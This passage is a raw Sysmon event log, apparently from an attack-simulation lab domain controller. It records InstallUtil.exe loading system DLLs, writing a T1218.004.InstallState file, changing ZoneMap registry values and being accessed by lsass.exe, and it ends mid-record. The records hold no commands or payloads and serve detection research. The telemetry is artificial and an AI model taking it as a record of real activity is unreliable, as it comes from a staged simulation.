534500x800000000000000057455684Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.909{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 734700x800000000000000057455683Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.894{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Servd1dec626#\367b724a8a8d7a8816e8029637e9af91\System.ServiceModel.Internals.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.ServiceModel.Internals.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.ServiceModel.Internals.dllMD5=D9D712B2F98C74C18C71B40FBFF12C72,SHA256=C1CB9C1223FFBBFA879B7972A34AD437C308829152CFF855802A6350C75B46A7false-Unavailable 734700x800000000000000057455682Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.894{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\SMDiagnostics\32788288a07982cb10ab4196907ef578\SMDiagnostics.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSMDiagnostics.dllMicrosoft® .NET FrameworkMicrosoft CorporationSMDiagnostics.dllMD5=6520C012D5164F22C0A4F96E82F7979A,SHA256=BD1F07E923DBA63862A75A4D312268EFF3391C155C1103B20964DF8F7E21D5C1false-Unavailable 11241100x800000000000000057455681Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.894{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Users\Administrator\AppData\Local\Temp\2\T1218.004.InstallState2021-11-12 14:22:43.753 23542300x800000000000000057455680Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.894{8B6011A9-78B4-618E-20F7-04000000F101}6444ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Users\Administrator\AppData\Local\Temp\2\T1218.004.InstallStateMD5=8340E57C6861AA09B7AC38E04EE8E33D,SHA256=A9E636FFAA636D4FDA92BCEE8422B7ABF8ABCF0BCF5FF860CEAF23E327FE0B21falsetrue 734700x800000000000000057455679Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.878{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runteb92aa12#\8a6f1fd5072bb947ca74e50ce391a3d3\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D2D5D6F2005BB57034DBE003EE9D14A0,SHA256=53E2A4CB20464A9CDCE924F9513882F3DA575DBE10B68C9437EA37C074AEA798false-Unavailable 734700x800000000000000057455678Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.878{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057455677Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.878{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057455676Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.878{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057455675Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.878{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057455674Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.878{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057455673Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.878{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057455672Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.878{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057455671Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057455670Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057455669Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057455668Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057455667Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057455666Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057455665Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057455664Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057455663Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057455662Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057455661Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057455660Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-886B-6164-0B00-00000000F101}6489732C:\Windows\system32\lsass.exe{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057455659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-886B-6164-0B00-00000000F101}6489732C:\Windows\system32\lsass.exe{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057455658Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057455657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057455656Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057455655Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057455654Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057455653Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057455652Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.863{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057455651Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.847{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057455650Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.847{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057455649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.847{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057455648Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.847{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057455647Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.847{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057455646Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 734700x800000000000000057455645Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 734700x800000000000000057455644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 13241300x800000000000000057455643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:44.831{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7d0-0xc2933cb6) 734700x800000000000000057455641Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057455640Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057455639Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057455638Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057455637Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057455636Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057455635Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 